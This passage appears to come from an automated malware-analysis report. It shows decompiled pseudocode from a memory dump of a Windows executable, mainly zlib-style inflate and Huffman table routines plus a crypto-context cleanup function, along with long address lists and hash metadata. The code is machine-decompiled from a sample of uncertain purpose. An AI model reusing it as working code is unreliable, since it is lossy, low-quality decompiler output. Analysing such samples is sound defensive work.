							_t488[1] = _t448;
							__eflags = _t448;
							if(_t448 == 0) {
								goto L116;
							}
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 6;
							goto L98;
						}
						_t455 = _t442 - 1;
						__eflags = _t455;
						if(_t455 == 0) {
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							_t456 = 3;
							_t33 = _t490 + 0xc;
							 *_t33 =  *(_t490 + 0xc) - _t456;
							__eflags =  *_t33;
							goto L16;
						}
						__eflags = _t455 == 1;
						if(_t455 == 1) {
							 *_t488 = 9;
							 *(_t485 + 0x18) = "invalid block type";
							_t488[8] =  *(_t490 + 8) >> 3;
							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
							L105:
							_t488[7] = _t461;
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							_push(0xfffffffd);
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						goto L98;
					}
					L104:
					__eax =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					goto L105;
					L122:
					__eax =  *(__ebp + 8);
					_push(1);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__eax =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					__edi[2] = __edi[2] + __ebx -  *__edi;
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					goto L100;
					L118:
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
					__ecx =  *(__esi + 0x34);
					__eflags =  *(__esi + 0x30) - __ecx;
					 *(__ebp - 8) = __ecx;
					if( *(__esi + 0x30) == __ecx) {
						 *__esi = 8;
						goto L122;
					}
					__ecx =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__ecx =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__ecx =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					_t409 =  &(__edi[2]);
					 *_t409 = __edi[2] + __ebx -  *__edi;
					__eflags =  *_t409;
					__ecx =  *(__ebp - 8);
					 *(__esi + 0x34) = __ecx;
					goto L120;
				}
			}

0x004043b7
0x004043b9
0x004043be
0x004043c2
0x004043c5
0x004043cb
0x004043cd
0x004043d3
0x004043d9
0x004043dc
0x004043e1
0x004043e4
0x004043f0
0x004043f0
0x004043e6
0x004043e9
0x004043e9
0x004043f2
0x004043f4
0x004043fa
0x004049c2
0x004049c5
0x004049c7
0x004049cd
0x004049d3
0x004049da
0x004049dc
0x004049dc
0x004049dc
0x004049e2
0x00000000
0x00404400
0x00404408
0x00404408
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404935
0x00404935
0x0040493b
0x0040493e
0x00404941
0x00404944
0x00404947
0x0040494c
0x0040494f
0x00404952
0x00404955
0x00404958
0x0040495b
0x00404963
0x00404966
0x00404b89
0x00404b89
0x004049e5
0x004049e5
0x004049e6
0x004049e7
0x004049ef
0x004049f3
0x004049f3
0x0040496c
0x00404979
0x0040497c
0x0040497e
0x00404981
0x00404984
0x00404985
0x00404988
0x0040498b
0x0040498c
0x0040498f
0x00404992
0x00404995
0x00404998
0x0040499a
0x004049a1
0x004049a4
0x004049a4
0x0040499c
0x0040499c
0x0040499e
0x0040499e
0x004049a7
0x004049ab
0x004049ae
0x00404b44
0x00000000
0x004049b4
0x004049b4
0x004049b4
0x004049b7
0x004049b7
0x004049b9
0x004049bc
0x00404402
0x00000000
0x00404405
0x00000000
0x004049bc
0x0040476e
0x0040476e
0x0040476e
0x00404771
0x00404774
0x00404776
0x00404779
0x0040477c
0x0040477f
0x0040477f
0x00404786
0x00404788
0x00000000
0x00000000
0x0040478e
0x00404791
0x00404791
0x00404794
0x00000000
0x00000000
0x00404796
0x0040479a
0x00404a58
0x00404a5b
0x00404a61
0x00404a64
0x00404a64
0x00404a64
0x00404a68
0x00404a6a
0x00404a6f
0x00404a71
0x00404a77
0x00000000
0x00404a77
0x004047a0
0x004047a3
0x004047a6
0x004047aa
0x004047ad
0x004047af
0x004047b2
0x004047b3
0x004047b3
0x004047b9
0x004047c0
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047d7
0x004047da
0x004047f5
0x004047f8
0x004047ff
0x004047ff
0x004047fa
0x004047fc
0x004047fc
0x00404802
0x00404804
0x0040480a
0x0040480b
0x0040480e
0x0040480e
0x00404811
0x00404814
0x00404814
0x00404817
0x0040481a
0x0040481d
0x00000000
0x00000000
0x0040481f
0x00404823
0x00000000
0x00000000
0x00404829
0x0040482c
0x0040482f
0x00404833
0x00404836
0x00404838
0x0040483b
0x0040483c
0x0040483c
0x00404842
0x0040484c
0x0040484f
0x00404852
0x00404854
0x00404857
0x0040485a
0x0040485c
0x0040485f
0x00404862
0x00404865
0x00404867
0x0040486a
0x0040486d
0x00404870
0x00404870
0x0040487a
0x0040487c
0x0040487e
0x00404a94
0x00404a9d
0x00404aa0
0x00404aa6
0x00404aad
0x00404ab0
0x00404ab5
0x00404ab8
0x00404abb
0x00404ac0
0x00404ac3
0x00404ac6
0x00404ac9
0x00404acc
0x00404acf
0x00000000
0x00404ad4
0x00404884
0x00404888
0x0040489c
0x0040489c
0x0040489e
0x0040489e
0x0040489e
0x004048a1
0x004048a4
0x004048a5
0x004048a5
0x004048a5
0x004048a5
0x004048aa
0x00000000
0x004048aa
0x0040488a
0x0040488d
0x00000000
0x00000000
0x00404893
0x00404896
0x00000000
0x00404896
0x004047dc
0x004047df
0x004047e1
0x004047e4
0x004047e7
0x004047ea
0x004047ed
0x004047ed
0x004048b3
0x004048b9
0x004048bc
0x004048c0
0x004048cc
0x004048d0
0x004048d4
0x004048d9
0x004048dc
0x004048df
0x004048e2
0x004048e7
0x004048e8
0x004048f1
0x004048f9
0x004048fc
0x004048fe
0x00404adc
0x00404ae0
0x00404ae0
0x00404ae8
0x00404aeb
0x00404aec
0x00404af2
0x00404af2
0x00404af3
0x00404af6
0x00404af9
0x00404afc
0x00404aff
0x00404b02
0x00404b05
0x00404b0a
0x00404b0c
0x00404b0e
0x00404b11
0x00404b14
0x00000000
0x00404b14
0x00404911
0x00404919
0x0040491b
0x00404b1c
0x00404b1f
0x00404b21
0x00404b27
0x00404b2d
0x00404b34
0x00404b36
0x00404b3c
0x00000000
0x00404b3c
0x00404924
0x0040492a
0x0040492d
0x0040492e
0x00404934
0x00000000
0x004046b8
0x004046bb
0x004046be
0x004046c1
0x004046c4
0x00404721
0x00404721
0x00404721
0x00404725
0x00000000
0x00000000
0x00404727
0x0040472a
0x00404734
0x00404738
0x00404738
0x0040473e
0x00404744
0x0040474c
0x00404752
0x0040475a
0x0040475d
0x0040475f
0x00404a8e
0x00000000
0x00404a8e
0x00404765
0x00404765
0x00404765
0x00404768
0x00000000
0x00000000
0x00000000
0x00000000
0x004046c6
0x004046c6
0x004046c6
0x004046c9
0x004046c9
0x004046cc
0x00000000
0x00000000
0x004046ce
0x004046d2
0x00000000
0x00000000
0x004046d8
0x004046db
0x004046df
0x004046e2
0x004046e4
0x004046e7
0x004046e8
0x004046eb
0x004046eb
0x004046f0
0x004046f0
0x004046f3
0x004046f6
0x004046f9
0x004046fc
0x00404703
0x00404707
0x0040470b
0x0040470e
0x00404711
0x00404714
0x0040471a
0x0040471d
0x0040471d
0x00000000
0x0040462b
0x0040462b
0x0040462e
0x0040462e
0x00404631
0x00000000
0x00000000
0x00404633
0x00404637
0x00000000
0x00000000
0x0040463d
0x00404640
0x00404644
0x00404647
0x00404649
0x0040464c
0x0040464d
0x00404650
0x00404650
0x00404655
0x00404658
0x0040465d
0x0040465f
0x00404662
0x00404665
0x00404668
0x00404a7f
0x00404a7f
0x00404a85
0x00000000
0x00404a85
0x00404670
0x00404676
0x0040467c
0x00000000
0x00000000
0x00404682
0x00404685
0x00404695
0x00404698
0x0040469b
0x0040469e
0x004046a0
0x00000000
0x00000000
0x004046a6
0x004046aa
0x004046ae
0x004046ae
0x004046ae
0x004046b2
0x00000000
0x0040453a
0x0040453a
0x0040453e
0x00000000
0x00000000
0x00404544
0x00404546
0x004045d7
0x004045d7
0x004045da
0x004045dd
0x004045e1
0x004045e3
0x004045e6
0x004045e8
0x004045e8
0x004045eb
0x004045ee
0x004045f1
0x004045f3
0x004045f3
0x004045fd
0x00404602
0x00404605
0x00404608
0x0040460b
0x0040460e
0x00404611
0x00404613
0x00404613
0x00404613
0x00404616
0x0040461c
0x0040461f
0x00404621
0x00404623
0x00404469
0x00404469
0x00404469
0x00000000
0x00404616
0x0040454c
0x0040454f
0x00404551
0x00404575
0x00404578
0x0040457b
0x00404580
0x00404585
0x00404588
0x0040458b
0x00404591
0x00404593
0x00404596
0x004045a3
0x004045a6
0x004045a6
0x004045a9
0x00404598
0x0040459a
0x0040459d
0x0040459e
0x0040459e
0x004045ac
0x004045af
0x004045b2
0x004045b4
0x004045b7
0x004045b9
0x004045bb
0x004045be
0x004045c8
0x004045c8
0x004045ca
0x004045c0
0x004045c0
0x004045c2
0x004045c3
0x004045c3
0x004045be
0x004045b9
0x004045cd
0x004045d1
0x00404a44
0x00404a47
0x00404a4a
0x00404a4d
0x00404a50
0x00404a53
0x00000000
0x00000000
0x00000000
0x00000000
0x004045d1
0x00404553
0x00404556
0x00404559
0x0040455b
0x00000000
0x00000000
0x0040455d
0x00404560
0x0040456a
0x0040456a
0x0040456c
0x00404562
0x00404562
0x00404565
0x00404565
0x0040456f
0x00404573
0x00000000
0x00000000
0x00000000
0x00000000
0x004044dc
0x004044dc
0x004044df
0x004044df
0x004044e2
0x00000000
0x00000000
0x004044e4
0x004044e8
0x00000000
0x00000000
0x004044ee
0x004044f1
0x004044f5
0x004044f8
0x004044fa
0x004044fd
0x004044fe
0x00404501
0x00404501
0x00404506
0x00404509
0x0040450c
0x0040450e
0x00404513
0x00404516
0x00404516
0x00404518
0x00404a12
0x00404a18
0x00000000
0x00404a18
0x0040451e
0x00404521
0x00404523
0x00404526
0x00404529
0x0040452c
0x00000000
0x00000000
0x00404534
0x00000000
0x00000000
0x0040440f
0x00404419
0x00000000
0x00000000
0x00404422
0x00404425
0x00404429
0x0040442e
0x00404431
0x00404432
0x00404432
0x0040443b
0x00404442
0x00404445
0x00404445
0x00404448
0x0040444b
0x004044b9
0x004044c3
0x004044c9
0x004044d1
0x004044d4
0x00000000
0x004044d4
0x0040444d
0x0040444d
0x0040444e
0x00404473
0x00404481
0x00404493
0x00404498
0x0040449b
0x0040449e
0x004044a0
0x00000000
0x00000000
0x004044a6
0x004044aa
0x004044ae
0x00000000
0x004044ae
0x00404450
0x00404450
0x00404451
0x0040445f
0x00404465
0x00404466
0x00404466
0x00404466
0x00000000
0x00404466
0x00404453
0x00404454
0x004049f7
0x00404a00
0x00404a07
0x00404a0d
0x00404a28
0x00404a28
0x00404a2e
0x00404a35
0x00404a37
0x00404a39
0x00404a3f
0x00000000
0x00404a3f
0x00000000
0x0040445a
0x00404a1f
0x00404a1f
0x00404a22
0x00404a25
0x00000000
0x00404b95
0x00404b95
0x00404b98
0x00404b9a
0x00404b9d
0x00404ba0
0x00404ba3
0x00404ba6
0x00404bab
0x00404bad
0x00404baf
0x00404bb2
0x00404bb5
0x00000000
0x00404b4a
0x00404b4d
0x00404b50
0x00404b55
0x00404b5a
0x00404b60
0x00404b63
0x00404b66
0x00404b8f
0x00000000
0x00404b8f
0x00404b68
0x00404b6b
0x00404b6e
0x00404b71
0x00404b74
0x00404b77
0x00404b7c
0x00404b7e
0x00404b80
0x00404b80
0x00404b80
0x00404b83
0x00404b86
0x00000000
0x00404b86

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}

0x004018ba
0x004018bc
0x004018c1
0x004018c4
0x004018ca
0x004018ca
0x004018ce
0x004018d3
0x004018d6
0x004018dc
0x004018dc
0x004018e0
0x004018e5
0x004018ea
0x004018f0
0x004018f0
0x004018f6
0x004018f8

APIs

CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404C19 Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char* _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				void* _v40;
				char _v43;
				signed char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v180;
				signed int _v184;
				signed int _v244;
				signed int _t190;
				intOrPtr* _t192;
				signed int _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				signed int _t199;
				intOrPtr _t203;
				intOrPtr _t207;
				signed char* _t211;
				signed char _t212;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t220;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t228;
				intOrPtr _t229;
				signed int _t231;
				char _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t241;
				signed int _t242;
				intOrPtr _t243;
				signed int* _t244;
				signed int _t246;
				signed int _t247;
				signed int* _t248;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t252;
				signed char _t257;
				signed int _t266;
				signed int _t269;
				signed char _t271;
				intOrPtr _t275;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t287;
				intOrPtr _t294;
				signed int _t296;
				intOrPtr* _t297;
				intOrPtr _t298;
				intOrPtr _t300;
				signed char _t302;
				void* _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t319;
				intOrPtr _t320;
				unsigned int _t321;
				intOrPtr* _t322;
				void* _t323;

				_t248 = _a4;
				_t296 = _a8;
				_t280 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_t307 = _t296;
				do {
					_t190 =  *_t248;
					_t248 =  &(_t248[1]);
					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
					_t307 = _t307 - 1;
				} while (_t307 != 0);
				if(_v120 != _t296) {
					_t297 = _a28;
					_t241 = 1;
					_t192 =  &_v116;
					_t308 =  *_t297;
					_t249 = _t241;
					_a28 = _t308;
					while( *_t192 == _t280) {
						_t249 = _t249 + 1;
						_t192 = _t192 + 4;
						if(_t249 <= 0xf) {
							continue;
						}
						break;
					}
					_v8 = _t249;
					if(_t308 < _t249) {
						_a28 = _t249;
					}
					_t309 =  &_v60;
					_t193 = 0xf;
					while( *_t309 == _t280) {
						_t193 = _t193 - 1;
						_t309 = _t309 - 4;
						if(_t193 != _t280) {
							continue;
						}
						break;
					}
					_v28 = _t193;
					if(_a28 > _t193) {
						_a28 = _t193;
					}
					_t242 = _t241 << _t249;
					 *_t297 = _a28;
					if(_t249 >= _t193) {
						L20:
						_t312 = _t193 << 2;
						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
						_t250 = _t323 + _t312 - 0x74;
						_t243 = _t242 - _t298;
						_v52 = _t243;
						if(_t243 < 0) {
							goto L39;
						}
						_v180 = _t280;
						 *_t250 = _t298 + _t243;
						_t251 = 0;
						_t195 = _t193 - 1;
						if(_t195 == 0) {
							L24:
							_t244 = _a4;
							_t300 = 0;
							do {
								_t196 =  *_t244;
								_t244 =  &(_t244[1]);
								if(_t196 != _t280) {
									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
									_t280 = 0;
								}
								_t300 = _t300 + 1;
							} while (_t300 < _a8);
							_v12 = _v12 | 0xffffffff;
							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
							_v16 = _t280;
							_v20 = _a40;
							_t199 = _v8;
							_t246 =  ~_a28;
							_v184 = _t280;
							_v244 = _t280;
							_v32 = _t280;
							_a4 = _t280;
							if(_t199 > _v28) {
								L64:
								if(_v52 == _t280 || _v28 == 1) {
									L4:
									return 0;
								} else {
									_push(0xfffffffb);
									goto L67;
								}
							}
							_v48 = _t199 - 1;
							_v36 = _t323 + _t199 * 4 - 0x74;
							do {
								_t203 =  *_v36;
								_v24 = _t203 - 1;
								if(_t203 == 0) {
									goto L63;
								} else {
									goto L31;
								}
								do {
									L31:
									_t207 = _a28 + _t246;
									if(_v8 <= _t207) {
										L46:
										_v43 = _v8 - _t246;
										_t257 = _a40 + _a8 * 4;
										_t211 = _v20;
										if(_t211 < _t257) {
											_t212 =  *_t211;
											if(_t212 >= _a12) {
												_t214 = _t212 - _a12 << 2;
												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
												_t302 =  *(_t214 + _a16);
											} else {
												_t302 = _t212;
												asm("sbb cl, cl");
												_v44 = (_t257 & 0x000000a0) + 0x60;
											}
											_v20 =  &(_v20[4]);
											L52:
											_t313 = 1;
											_t314 = _t313 << _v8 - _t246;
											_t216 = _v16 >> _t246;
											if(_t216 >= _a4) {
												L56:
												_t217 = 1;
												_t218 = _t217 << _v48;
												_t266 = _v16;
												while((_t266 & _t218) != 0) {
													_t266 = _t266 ^ _t218;
													_t218 = _t218 >> 1;
												}
												_v16 = _t266 ^ _t218;
												_t220 = _t323 + _v12 * 4 - 0xb4;
												while(1) {
													_t315 = 1;
													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
														goto L62;
													}
													_v12 = _v12 - 1;
													_t220 = _t220 - 4;
													_t246 = _t246 - _a28;
												}
												goto L62;
											}
											_t277 = _v32 + _t216 * 8;
											do {
												_t216 = _t216 + _t314;
												 *_t277 = _v44;
												_t277[4] = _t302;
												_t277 = _t277 + (_t314 << 3);
											} while (_t216 < _a4);
											_t280 = 0;
											goto L56;
										}
										_v44 = 0xc0;
										goto L52;
									} else {
										goto L32;
									}
									do {
										L32:
										_t269 = _a28;
										_v12 = _v12 + 1;
										_t246 = _t246 + _t269;
										_v56 = _t207 + _t269;
										_t224 = _v28 - _t246;
										_a4 = _t224;
										if(_t224 > _t269) {
											_a4 = _t269;
										}
										_t271 = _v8 - _t246;
										_t225 = 1;
										_t226 = _t225 << _t271;
										_t282 = _v24 + 1;
										if(_t226 <= _t282) {
											L40:
											_t283 = 1;
											_t228 =  *_a36;
											_t284 = _t283 << _t271;
											_a4 = _t284;
											_t319 = _t228 + _t284;
											if(_t319 > 0x5a0) {
												goto L39;
											}
										} else {
											_t320 = _v36;
											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
											if(_t271 >= _a4) {
												goto L40;
											} else {
												goto L36;
											}
											while(1) {
												L36:
												_t271 = _t271 + 1;
												if(_t271 >= _a4) {
													goto L40;
												}
												_t294 =  *((intOrPtr*)(_t320 + 4));
												_t320 = _t320 + 4;
												_t237 = _t236 << 1;
												if(_t237 <= _t294) {
													goto L40;
												}
												_t236 = _t237 - _t294;
											}
											goto L40;
										}
										_t229 = _a32 + _t228 * 8;
										_v32 = _t229;
										_t287 = _t323 + _v12 * 4 - 0xf0;
										 *_t287 = _t229;
										 *_a36 = _t319;
										_t231 = _v12;
										if(_t231 == 0) {
											 *_a24 = _v32;
										} else {
											_t321 = _v16;
											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
											_t233 = _a28;
											_v44 = _t271;
											_v43 = _t233;
											_t235 = _t321 >> _t246 - _t233;
											_t275 =  *((intOrPtr*)(_t287 - 4));
											_t302 = (_v32 - _t275 >> 3) - _t235;
											 *(_t275 + _t235 * 8) = _v44;
											 *(_t275 + 4 + _t235 * 8) = _t302;
										}
										_t207 = _v56;
									} while (_v8 > _t207);
									_t280 = 0;
									goto L46;
									L62:
									_v24 = _v24 - 1;
								} while (_v24 != 0);
								L63:
								_v8 = _v8 + 1;
								_v36 = _v36 + 4;
								_v48 = _v48 + 1;
							} while (_v8 <= _v28);
							goto L64;
						}
						_t306 = 0;
						do {
							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
							_t306 = _t306 + 4;
							_t195 = _t195 - 1;
							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
						} while (_t195 != 0);
						goto L24;
					} else {
						_t322 = _t323 + _t249 * 4 - 0x74;
						while(1) {
							_t247 = _t242 -  *_t322;
							if(_t247 < 0) {
								break;
							}
							_t249 = _t249 + 1;
							_t322 = _t322 + 4;
							_t242 = _t247 << 1;
							if(_t249 < _t193) {
								continue;
							}
							goto L20;
						}
						L39:
						_push(0xfffffffd);
						L67:
						_pop(_t194);
						return _t194;
					}
				}
				 *_a24 = 0;
				 *_a28 = 0;
				goto L4;
			}

0x00404c22
0x00404c28
0x00404c2b
0x00404c2d
0x00404c30
0x00404c33
0x00404c36
0x00404c39
0x00404c3c
0x00404c3f
0x00404c42
0x00404c45
0x00404c48
0x00404c4b
0x00404c4e
0x00404c51
0x00404c54
0x00404c57
0x00404c5a
0x00404c5d
0x00404c5f
0x00404c5f
0x00404c61
0x00404c64
0x00404c6c
0x00404c6c
0x00404c72
0x00404c85
0x00404c8a
0x00404c8b
0x00404c8e
0x00404c90
0x00404c92
0x00404c95
0x00404c99
0x00404c9a
0x00404ca0
0x00000000
0x00000000
0x00000000
0x00404ca0
0x00404ca4
0x00404ca7
0x00404ca9
0x00404ca9
0x00404cae
0x00404cb1
0x00404cb2
0x00404cb6
0x00404cb7
0x00404cbc
0x00000000
0x00000000
0x00000000
0x00404cbc
0x00404cc1
0x00404cc4
0x00404cc6
0x00404cc6
0x00404ccc
0x00404cd0
0x00404cd2
0x00404cea
0x00404cec
0x00404cef
0x00404cf3
0x00404cf7
0x00404cf9
0x00404cfc
0x00000000
0x00000000
0x00404d04
0x00404d0a
0x00404d0c
0x00404d0e
0x00404d0f
0x00404d24
0x00404d24
0x00404d27
0x00404d29
0x00404d29
0x00404d2b
0x00404d30
0x00404d32
0x00404d43
0x00404d47
0x00404d49
0x00404d49
0x00404d4b
0x00404d4c
0x00404d5b
0x00404d5f
0x00404d65
0x00404d68
0x00404d6b
0x00404d6e
0x00404d73
0x00404d79
0x00404d7f
0x00404d82
0x00404d85
0x00404f85
0x00404f88
0x00404c7e
0x00000000
0x00404f98
0x00404f98
0x00000000
0x00404f98
0x00404f88
0x00404d95
0x00404d98
0x00404d9b
0x00404d9e
0x00404da5
0x00404da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dae
0x00404dae
0x00404db1
0x00404db6
0x00404e9a
0x00404ea2
0x00404ea8
0x00404eab
0x00404eb0
0x00404eb8
0x00404ebd
0x00404ed9
0x00404ee2
0x00404ee8
0x00404ebf
0x00404ec4
0x00404ec6
0x00404ece
0x00404ece
0x00404eeb
0x00404eef
0x00404ef9
0x00404efa
0x00404efe
0x00404f03
0x00404f23
0x00404f28
0x00404f29
0x00404f2b
0x00404f2e
0x00404f32
0x00404f34
0x00404f34
0x00404f3d
0x00404f40
0x00404f47
0x00404f4b
0x00404f54
0x00000000
0x00000000
0x00404f56
0x00404f59
0x00404f5c
0x00404f5c
0x00000000
0x00404f47
0x00404f08
0x00404f0b
0x00404f0e
0x00404f10
0x00404f17
0x00404f1a
0x00404f1c
0x00404f21
0x00000000
0x00404f21
0x00404eb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dbc
0x00404dbc
0x00404dbc
0x00404dbf
0x00404dc4
0x00404dc6
0x00404dcc
0x00404dd0
0x00404dd3
0x00404dd5
0x00404dd5
0x00404de0
0x00404de2
0x00404de3
0x00404de5
0x00404de8
0x00404e17
0x00404e1c
0x00404e1d
0x00404e1f
0x00404e21
0x00404e24
0x00404e2d
0x00000000
0x00000000
0x00404dea
0x00404dea
0x00404df3
0x00404df8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dfa
0x00404dfa
0x00404dfa
0x00404dfe
0x00000000
0x00000000
0x00404e00
0x00404e03
0x00404e06
0x00404e0a
0x00000000
0x00000000
0x00404e0c
0x00404e0c
0x00000000
0x00404dfa
0x00404e32
0x00404e38
0x00404e3b
0x00404e42
0x00404e47
0x00404e49
0x00404e4e
0x00404e8a
0x00404e50
0x00404e50
0x00404e56
0x00404e5d
0x00404e60
0x00404e65
0x00404e6c
0x00404e6e
0x00404e79
0x00404e7b
0x00404e7e
0x00404e7e
0x00404e8c
0x00404e8f
0x00404e98
0x00000000
0x00404f61
0x00404f64
0x00404f67
0x00404f6f
0x00404f6f
0x00404f72
0x00404f79
0x00404f7c
0x00000000
0x00404d9b
0x00404d11
0x00404d13
0x00404d13
0x00404d17
0x00404d1a
0x00404d1b
0x00404d1b
0x00000000
0x00404cd4
0x00404cd4
0x00404cd8
0x00404cd8
0x00404cda
0x00000000
0x00000000
0x00404ce0
0x00404ce1
0x00404ce4
0x00404ce8
0x00000000
0x00000000
0x00000000
0x00404ce8
0x00404e10
0x00404e10
0x00404f9a
0x00404f9a
0x00000000
0x00404f9a
0x00404cd2
0x00404c77
0x00404c7c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
